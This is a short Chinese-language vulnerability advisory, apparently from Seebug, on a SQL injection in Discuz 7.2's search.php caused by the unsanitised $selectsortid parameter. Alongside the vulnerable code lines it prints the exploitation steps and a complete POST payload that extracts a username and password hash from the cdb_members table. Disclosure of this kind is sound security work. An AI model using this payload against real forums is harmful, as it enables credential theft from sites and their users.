Discuz 7.2 /search.php SQL注入漏洞

2014-07-30T00:00:00
ID SSV:88733
Type seebug
Reporter Root
Modified 2014-07-30T00:00:00

Description

<p>在文件/include/search_sort.inc.php150行<br></p><pre class="">@include_once DISCUZ_ROOT.'./forumdata/cache/threadsort_'.$selectsortid.'.php'; </pre><p>这个$selectsortid变量没有做过任何处理,而且最后进入到了170行的SQL语句<br></p><pre class="">$query = $db->query("SELECT tid FROM {$tablepre}optionvalue$selectsortid ".($sqlsrch ? 'WHERE '.$sqlsrch : '').""); </pre><p>导致了SQL注入的产生<br></p><p><br></p><p>漏洞利用过程</p><p><br></p><p>1.登陆论坛</p><p>2.访问</p><p><a href="http://xxxx.com/search.php">http://xxxx.com/search.php</a></p><p>post数据:</p><pre class="">formhash=1&srchtype=threadsort&st=on&sortid=3&searchsubmit=true&selectsortid=3 where tid =1 and (select 1 from (select count(),concat((select (select (select concat(username,0x3a,password) from cdb_members limit 1) ) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)%23&srcchtxt=aaa </pre><p><img alt="1.png" src="https://images.seebug.org/@/uploads/1434683988673-1.png" data-image-size="865,296"><br></p>